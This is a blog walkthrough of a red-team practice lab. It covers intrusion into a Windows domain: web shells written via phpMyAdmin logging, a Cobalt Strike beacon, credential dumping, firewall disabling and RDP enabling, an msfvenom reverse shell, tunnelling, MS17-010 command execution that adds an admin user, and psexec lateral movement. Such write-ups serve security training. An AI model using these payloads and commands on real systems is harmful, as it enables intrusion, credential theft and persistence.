跳到正文
Mo1u's blog 这趟旅行若是开心,亦是无负这一生
Go back

ATT&CK 红队靶场实战 - 红日靶场 1

网络配置

设备IP 地址
Windows 7 x64 (Web 服务器)192.168.52.133 (NAT), 192.168.61.128 (仅主机)
Windows Server 2008 R2 x64 (域控制器 DC)192.168.52.138(NAT)
Win2K3 Metasploitable (域成员)192.168.52.141(NAT)

配置好后就开打

win7这台机子是入口i点

初步渗透

入口-win 7

访问192.168.61.128,发现phpstudy探针 拿到一些站点的信息:php版本5.4,开启了sql数据库

.\fscan.exe -h 192.168.61.128 -nobr -nopoc -np -p 1-65535

┌──────────────────────────────────────────────┐
    ___                              _
   / _ \     ___  ___ _ __ __ _  ___| | __
  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.1s]     已选择服务扫描模式
[1.1s]     开始信息扫描
[1.1s]     最终有效主机数量: 1
[1.1s]     开始主机扫描
[1.1s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.1s]     有效端口数量: 65535
[1.2s] [*] 端口开放 192.168.61.128:80
[16.2s] [*] 端口开放 192.168.61.128:3306
[5m31s]     扫描完成, 发现 2 个开放端口
[5m31s]     存活端口数量: 2
[5m31s]     开始漏洞扫描
[5m33s] [*] 网站标题 http://192.168.61.128     状态码:200 长度:14749  标题:phpStudy 探针 2014
[5m33s]     扫描已完成: 3/3

-nobr 跳过弱口令爆破 -nopoc 跳过 Web 漏洞 POC 扫描 -np 跳过存活探测(直接扫端口,适合已知目标存活时) -p 指定端口(范围)

看到有3306端口,再次确认了mysql的存在

上目录扫描

python dirsearch.py -u http://192.168.61.128/


  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12288

Target: http://192.168.61.128/

[20:05:59] Scanning:
[20:06:05] 403 -   225B - /index.php::$DATA
[20:06:07] 200 -   14KB - /l.php
[20:06:07] 200 -   71KB - /phpinfo.php
[20:06:07] 301 -   241B - /phpMyAdmin  ->  http://192.168.61.128/phpMyAdmin/
[20:06:07] 301 -   241B - /phpmyadmin  ->  http://192.168.61.128/phpmyadmin/
[20:06:07] 200 -   32KB - /phpmyadmin/ChangeLog
[20:06:07] 200 -    2KB - /phpmyadmin/README
[20:06:07] 200 -    4KB - /phpmyAdmin/
[20:06:07] 200 -    4KB - /phpMyAdmin/index.php
[20:06:07] 200 -    4KB - /phpMyAdmin/
[20:06:07] 200 -    4KB - /phpMyadmin/
[20:06:07] 200 -    4KB - /phpmyadmin/
[20:06:07] 200 -    4KB - /phpmyadmin/index.php
[20:06:09] 403 -   225B - /Trace.axd::$DATA
[20:06:10] 403 -   226B - /web.config::$DATA

Task Completed

看其他大手子的wp学习另一个工具使用:wfuzz

wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404

http://192.168.61.128/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.61.128/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000013:   403        9 L      24 W       218 Ch      ".htpasswd"
000000012:   403        9 L      24 W       218 Ch      ".htaccess"
000000011:   403        9 L      24 W       213 Ch      ".hta"
000000533:   403        9 L      24 W       212 Ch      "aux"
000000942:   403        9 L      24 W       213 Ch      "com1"
000000944:   403        9 L      24 W       213 Ch      "com3"
000000943:   403        9 L      24 W       213 Ch      "com2"
000000988:   403        9 L      24 W       212 Ch      "con"
000002375:   403        9 L      24 W       213 Ch      "lpt2"
000002374:   403        9 L      24 W       213 Ch      "lpt1"
000002710:   403        9 L      24 W       212 Ch      "nul"
000002954:   301        7 L      20 W       241 Ch      "phpmyadmin"
000002955:   301        7 L      20 W       241 Ch      "phpMyAdmin"
000002946:   200        957 L    4843 W     71898 Ch    "phpinfo.php"
000003124:   403        9 L      24 W       212 Ch      "prn"
000000001:   200        400 L    850 W      13051 Ch    "http://192.168.61.128/"

Total time: 0
Processed Requests: 4614
Filtered Requests: 4598
Requests/sec.: 0

wfuzz扫的还挺快^^

可以看到还是有些货的,这里主要是phpMyAdmin这个服务,访问看看 尝试默认密码:root/root进去了 发现数据库里有个:newyxcms 发现http://192.168.61.128/yxcms/下确实存在yxcms

寻找资料发现如果开了管理员登陆,http://192.168.61.128/yxcms/index.php?r=admin会指向后台登录页面,这里暴露了版本号YxcmsApp 1.2.1 此处默认密码:admin/123456可登录 记一次内网渗透_yxcms-CSDN博客 在模板编辑处写php马,此处写到index_index.php

<?php eval($_POST['a']); ?>

找不到路径,直接插主页里

这里getshell还有一个方法,直接拿phpmyadmin写马

常见phpmyadmin-getshll方法: 1、select into outfile直接写入 2、开启全局日志getshell 3、使用慢查询日志getsehll 4、使用错误日志getshell 5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

执行sql语句:

show variables like '%secure%';

这是没有写入权限的意思,也就无法用select into outfile方法写入shell

尝试第二种方法,利用全局变量general_log去getshell 开启全局日志,并把日志设一个我们能访问的web路径

set global general_log=on;# 开启日志
set global general_log_file='C:/phpStudy/WWW/a.php';# 设置日志位置为网站目录

写个shell让他记录在日志里,在访问上面的日志目录即可getshell

SELECT "<?php @eval($_POST['hack']);?>";

横向移动

cs打法

上线

上线cs,设定好监听器(可以把回连改1,毕竟不是实战,控制台也可以改)

sleep 1

生成beacon.exe,传蚁剑上,运行即可上线 上线cs后能借助插件来探测内网和抓哈希之类的,但是还是得会命令探测(见下文)

提权

直接用右键的菜单就可以执行提权 用svc-exe即可,也可直接控制台使用:

elevate svc-exe mkbk

这时SYSTEM用户就上线了(记得改回连间隔)

抓取明文密码

右键菜单或者

logonpasswords

视图->密码凭证可以更方便看明文密码 抓到administrator的明文密码:hongrisec@2019

RDP连接

RDP端口:3389,用下面的命令来查询3389的开启状态

shell netstat -ano | findstr 3389

这里其实是输出了空行,所以可以判断3389未开启 利用此命令开启3389端口的rdp服务,出现操作成功完成即是成功开启

shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

大致是通过修改防火墙设置来强制开启rdp服务

再用上面的命令探测3389状态,可以发现有回显了

win+R输入mstsc.exe可以快速打开rdp连接,但是此处连不上这个端口,考虑是防火墙,用nmap探测一下状态

nmap -Pn -n -p 3389 192.168.61.128

Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 00:21 +0800
Nmap scan report for 192.168.61.128
Host is up (0.00040s latency).

PORT     STATE    SERVICE
3389/tcp filtered ms-wbt-server
MAC Address: 00:0C:29:7D:4E:5E (VMware)

发现是filtered(被过滤)状态,这大概率就是防火墙的问题了,查询一下防火墙状态

shell netsh advfirewall show allprofiles

返回状态:

域配置文件 设置:
----------------------------------------------------------------------
状态                                  打开
防火墙策略                          BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (仅 GPO 存储)
LocalConSecRules                      N/A (仅 GPO 存储)
InboundUserNotification               启用
RemoteManagement                      禁用
UnicastResponseToMulticast            启用

日志:
LogAllowedConnections                 禁用
LogDroppedConnections                 禁用
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096


专用配置文件 设置:
----------------------------------------------------------------------
状态                                  打开
防火墙策略                          BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (仅 GPO 存储)
LocalConSecRules                      N/A (仅 GPO 存储)
InboundUserNotification               启用
RemoteManagement                      禁用
UnicastResponseToMulticast            启用

日志:
LogAllowedConnections                 禁用
LogDroppedConnections                 禁用
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096


公用配置文件 设置:
----------------------------------------------------------------------
状态                                  打开
防火墙策略                          BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (仅 GPO 存储)
LocalConSecRules                      N/A (仅 GPO 存储)
InboundUserNotification               启用
RemoteManagement                      禁用
UnicastResponseToMulticast            启用

日志:
LogAllowedConnections                 禁用
LogDroppedConnections                 禁用
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096

确定。

可以看到防火墙状态是启用,且BlockInbound策略拦截了入站流量 尝试关闭防火墙(在这个靶机是可以用的):

shell netsh advfirewall set allprofiles state off

如果不行,尝试单独放行rdp流量

netsh advfirewall firewall add rule name="Allow Remote Desktop" action=allow dir=in protocol=TCP localport=3389

再次连接RDP,用god/administrator上192.168.61.128 但是这里虚拟机出了点问题,用正确密码居然上不去(怀疑是我上线没弹更改密码。。。)于是以下直接在虚拟机里打

内网探活

cs执行

shell ipconfig

除了192.168.61.128(外网ip)外i,还有个192.168.52.143,这里确定内网ip段192.168.52.143/24

Windows IP 配置


以太网适配器 本地连接 5:

   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::2189:745c:5dfd:c987%26
   IPv4 地址 . . . . . . . . . . . . : 192.168.61.128
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.61.2

以太网适配器 Npcap Loopback Adapter:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::b461:ccad:e30f:81ba%24
   自动配置 IPv4 地址  . . . . . . . : 169.254.129.186
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . :

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::8d2f:bdb9:e2b7:f7a1%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.52.143
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.52.2

桌面上有nmap,也省得我们往里面丢文件了,直接利用nmap开扫 cs执行:

shell nmap -sn -PR -n 192.168.52.143/24

注意到system用户执行会返回’nmap’ 不是内部或外部命令,也不是可运行的程序估计是读不到环境变量,如果要用这个用户扫,手动指定下路径

shell "C:\Program Files (x86)\Nmap\nmap.exe" -sn -PR -n 192.168.52.143/24

Nmap scan report for 192.168.52.1
Host is up (0.00s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.52.138
Host is up (0.00s latency).
MAC Address: 00:0C:29:D2:41:91 (VMware)
Nmap scan report for 192.168.52.141
Host is up (0.00s latency).
MAC Address: 00:0C:29:73:3A:6D (VMware)
Nmap scan report for 192.168.52.254
Host is up (0.00s latency).
MAC Address: 00:50:56:F2:0C:08 (VMware)
Nmap scan report for 192.168.52.133
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.87 seconds

内网除了有 192.168.52.1 和 192.168.52.2192.168.52.254 这 3 个 VMWare 虚拟网关地址外,还有 192.168.52.138 和 192.168.52.141 两台主机。这里已知win7在域内 用命令探测域内主机(注意不可以有shell,在cs内运行)

net view

可以看到192.168.52.138 是PDC

Primary Domain Controller 主域控制器

命令执行完成后,CS 会自动将探测到的设备加入” 目标列表”

现在横向两台机子,先做端口扫描(这里有点问题,nmap卡了很久,最后还是上传了fscan进行扫描)

shell C:/fscan.exe -h 192.168.52.138 -o result.txt
shell C:/fscan.exe -h 192.168.52.143 -o result.txt

发现都起了巨多服务


[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=139
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=135
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=88
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=80
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=53
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=593
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=464
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=445
[2026-03-27 01:44:19] [PORT] 目标:192.168.52.138 状态:open 详情:port=389
[2026-03-27 01:44:22] [PORT] 目标:192.168.52.138 状态:open 详情:port=636
[2026-03-27 01:44:34] [PORT] 目标:192.168.52.138 状态:open 详情:port=3269
[2026-03-27 01:44:34] [PORT] 目标:192.168.52.138 状态:open 详情:port=3268
[2026-03-27 01:45:04] [PORT] 目标:192.168.52.138 状态:open 详情:port=9389
[2026-03-27 01:48:23] [PORT] 目标:192.168.52.138 状态:open 详情:port=49158
[2026-03-27 01:48:23] [PORT] 目标:192.168.52.138 状态:open 详情:port=49157
[2026-03-27 01:48:23] [PORT] 目标:192.168.52.138 状态:open 详情:port=49155
[2026-03-27 01:48:23] [PORT] 目标:192.168.52.138 状态:open 详情:port=49154
[2026-03-27 01:48:23] [PORT] 目标:192.168.52.138 状态:open 详情:port=49167
[2026-03-27 01:48:23] [PORT] 目标:192.168.52.138 状态:open 详情:port=49161
[2026-03-27 01:49:50] [SERVICE] 目标:192.168.52.138 状态:identified 详情:hostname=owa, ipv4=[192.168.52.138], ipv6=[]
[2026-03-27 01:49:50] [SERVICE] 目标:192.168.52.138 状态:identified 详情:service=http, title=IIS7, Url=http://192.168.52.138, status_code=200, length=689, server_info=map[accept-ranges:bytes content-type:text/html date:Thu, 26 Mar 2026 17:49:50 GMT etag:"69f04487835ad51:0" last-modified:Sat, 24 Aug 2019 13:55:03 GMT length:689 server:Microsoft-IIS/7.5 status_code:200 title:IIS7 vary:Accept-Encoding x-powered-by:ASP.NET], fingerprints=[], port=80
[2026-03-27 01:49:50] [VULN] 目标:192.168.52.138 状态:vulnerable 详情:port=445, vulnerability=MS17-010, os=Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[2026-03-27 01:49:50] [SERVICE] 目标:192.168.52.138 状态:identified 详情:domain_name=god.org, netbios_domain=GOD, netbios_computer=OWA, workstation_service=OWA, domain_controllers=GOD, port=139, computer_name=owa.god.org, server_service=OWA, os_version=Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=7002
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=7001
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=445
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=139
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=135
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=21
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=8099
[2026-03-27 01:51:22] [PORT] 目标:192.168.52.141 状态:open 详情:port=8098
[2026-03-27 01:51:23] [SERVICE] 目标:192.168.52.141 状态:identified 详情:hostname=root-tvi862ubeh, ipv4=[192.168.52.141], ipv6=[]
[2026-03-27 01:51:24] [SERVICE] 目标:192.168.52.141 状态:identified 详情:title=Sentinel Keys License Monitor, Url=http://192.168.52.141:7002, status_code=200, length=2632, server_info=map[content-length:2632 content-type:text/html date:Thu, 26 Mar 2026 17:51:25 GMT keep-alive:1 length:2632 mime-version:1.1 server:SentinelKeysServer/1.0 status_code:200 title:Sentinel Keys License Monitor], fingerprints=[], port=7002, service=http
[2026-03-27 01:51:24] [VULN] 目标:192.168.52.141 状态:vulnerable 详情:port=445, vulnerability=MS17-010, os=Windows Server 2003 3790
[2026-03-27 01:51:24] [VULN] 目标:192.168.52.141 状态:vulnerable 详情:type=anonymous-login, directories=[], port=21, service=ftp, username=anonymous, password=
[2026-03-27 01:51:25] [SERVICE] 目标:192.168.52.141 状态:identified 详情:length=1409, server_info=map[content-length:1409 content-type:text/html date:Thu, 26 Mar 2026 17:51:27 GMT length:1409 server:Microsoft-IIS/6.0 status_code:403 title:The page must be viewed over a secure channel x-powered-by:ASP.NET], fingerprints=[], port=8099, service=http, title=The page must be viewed over a secure channel, Url=http://192.168.52.141:8099, status_code=403
[2026-03-27 01:51:26] [SERVICE] 目标:192.168.52.141 状态:identified 详情:title=You are not authorized to view this page, Url=https://192.168.52.141:8098, status_code=401, length=1656, server_info=map[content-length:1656 content-type:text/html date:Thu, 26 Mar 2026 17:51:27 GMT length:1656 server:Microsoft-IIS/6.0 status_code:401 title:You are not authorized to view this page www-authenticate:Basic realm="192.168.52.141" x-powered-by:ASP.NET], fingerprints=[], port=8098, service=http

指纹这里也扫到有熟悉的MS17-010,不过我们这里关注 445端口,也就是SMB服务

利用psexec横向

创建一个 SMB 监听器,名字自取,Payload 为 Beacon SMB

进入目标列表, 右键选择 192.168.52.138 主机 ,进入横向移动psexec配置菜单,在菜单中选择监听器为前面创建好的监听器,会话选择 System 用户,将下面的选项打勾,然后点击运行:

勘误:这里的密码应该是我上面改过的hongrisec@2026 最后拿下域内三台机子

msf打法

命令集:

cs里用需要在前面加shell

 ipconfig /all   # 查看本机ip,所在域
 route print     # 打印路由信息
 net view        # 查看局域网内其他主机名
 arp -a          # 查看arp缓存
 net start       # 查看开启了哪些服务
 net share       # 查看开启了哪些共享
 net share ipc$  # 开启ipc共享
 net share c$    # 开启c盘共享
 net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
 net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
 dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件

 net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 # 查看本机用户列表
 net user /domain         # 查看域用户
 net localgroup administrators    # 查看本地管理员组(通常会有域用户)
 net view /domain         # 查看有几个域
 net user 用户名 /domain   # 获取指定域用户的信息
 net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
 net group 组名 /domain    # 查看域中某工作组
 net group "domain admins" /domain  # 查看域管理员的名字
 net group "domain computers" /domain  # 查看域中的其他主机名
 net group "doamin controllers" /domain  # 查看域控制器(可能有多台)

上线

启动一个msfconsole

msfconsole

做个弹shell的马

msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.61.130 lport=5566 -f exe -o shell.exe

msf反弹shell

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.61.130
set lport 5566
run

蚁剑运行shell.exe即可getshell

信息收集

C:\phpStudy\WWW> ipconfig /all
 ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : stu1
   Primary Dns Suffix  . . . . . . . : god.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : god.org

Ethernet adapter �������� 5:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #3
   Physical Address. . . . . . . . . : 00-0C-29-7D-4E-5E
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::2189:745c:5dfd:c987%26(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.52.133(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 721423401
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : 192.168.52.138
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Npcap Loopback Adapter:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Npcap Loopback Adapter
   Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%24(Preferred)
   Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 268566604
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter �������� 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : TAP-Windows Adapter V9 #2
   Physical Address. . . . . . . . . : 00-FF-56-0B-EA-FC
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter �������� 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : TAP-Windows Adapter V9
   Physical Address. . . . . . . . . : 00-FF-44-8D-CB-B5
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter ��������:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-7D-4E-54
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::8d2f:bdb9:e2b7:f7a1%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.61.128(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{448DCBB5-7D61-4538-9C03-66B5CDAD1222}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{560BEAFC-DAC4-4687-A564-57790875DC43}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #4
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{EAF83BF9-B070-4177-8CAF-7650F334F0C1}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #5
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

发现存在域god.org

net config Workstation

net config Workstation
Computer name                        \\STU1
Full Computer name                   stu1.god.org
User name                            Administrator

Workstation active on
        NetBT_Tcpip_{EAF83BF9-B070-4177-8CAF-7650F334F0C1} (000C297D4E5E)
        NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C297D4E54)
        NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)

Software version                     Windows 7 Professional

Workstation domain                   GOD
Workstation Domain DNS Name          god.org
Logon domain                         GOD

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
The command completed successfully.

也能发现域,查一下有几个域

net view /domain

Domain

--------------------------------------------------------------------------
GOD
The command completed successfully.

查询域内主机

net view

Server Name            Remark

--------------------------------------------------------------------------
\\OWA
\\ROOT-TVI862UBEH
\\STU1
The command completed successfully.

查询域内ip

arp -a

Interface: 192.168.61.128 --- 0xb
  Internet Address      Physical Address      Type
  192.168.61.1          00-50-56-c0-00-08     dynamic
  192.168.61.130        00-0c-29-dc-53-fb     dynamic
  192.168.61.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static

Interface: 169.254.129.186 --- 0x18
  Internet Address      Physical Address      Type
  169.254.255.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static

Interface: 192.168.52.133 --- 0x1a
  Internet Address      Physical Address      Type
  192.168.52.138        00-0c-29-d2-41-91     dynamic
  192.168.52.141        00-0c-29-73-3a-6d     dynamic
  192.168.52.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static

为了确定域控ip,可以ping以下域名

ping owa.god.org

Pinging owa.god.org [192.168.52.138] with 32 bytes of data:
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.52.138:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:

维权

退到metepreter,使用ps命令可以看到当前进程,输入gitpid查看当前进程的进程号 迁移进程

migrate 2320

自动寻找进程迁移

run post/windows/manage/migrate

会自己找个进程迁移过去

搭建隧道

stowaway:

kali:./linux_x64_admin -l 1122
win7:windows_x64_agent.exe -c 192.168.61.130:1122
kali:use 0
kali:socks 1123

这样就在1123上打开了一个socks5的隧道,kali上用proxychains链接隧道

vim /etc/proxychains4.conf
socks5 192.168.61.128 1123

setg Proxies socks5:192.168.61.128:1123
setg ReverseAllowProxy true

msf连接隧道

use auxiliary/server/socks4a
 set srvhost 192.168.61.128
 set srvport 1123
 run

带上proxychains可以在隧道执行命令

proxychains curl http://192.168.52.143/

msf扫描开放端口

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set threads 100
run

msf扫描系统版本

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.141
run

存在永恒之蓝,msf直接可以打

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.52.141
run

exploit/windows/smb/ms17_010_eternalblue在这里打不了,但是用auxiliary/admin/smb/ms17_010_command可以rce

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command whoami
run
set command net user blckder02 8888! #/add添加用户;
set command net localgroup administrators blckder02 /add #添加管理员权限;
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'  #执行命令开启3389端口,这里要么用单引号把命令引住,要么用反斜杠对反斜杠和引号进行转义,否则会出错;

proxychains rdesktop 192.168.52.141远程桌面连接成功,可以用添加的用户进行登录 可以使用exploit/windows/smb/ms17_010_psexec模块反弹一个shell

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.141
run

set command netsh firewall set opmode mode=disable关闭防火墙 下面那台机子跟这个一样的打法,拿下域控

总结

这是我打的第一个带域的渗透靶场,第一次玩域渗透还是十分生疏,横向还是看着wp学的,希望多打点能熟练熟练



Previous Post
ATT&CK 红队靶场实战 - 红日靶场 2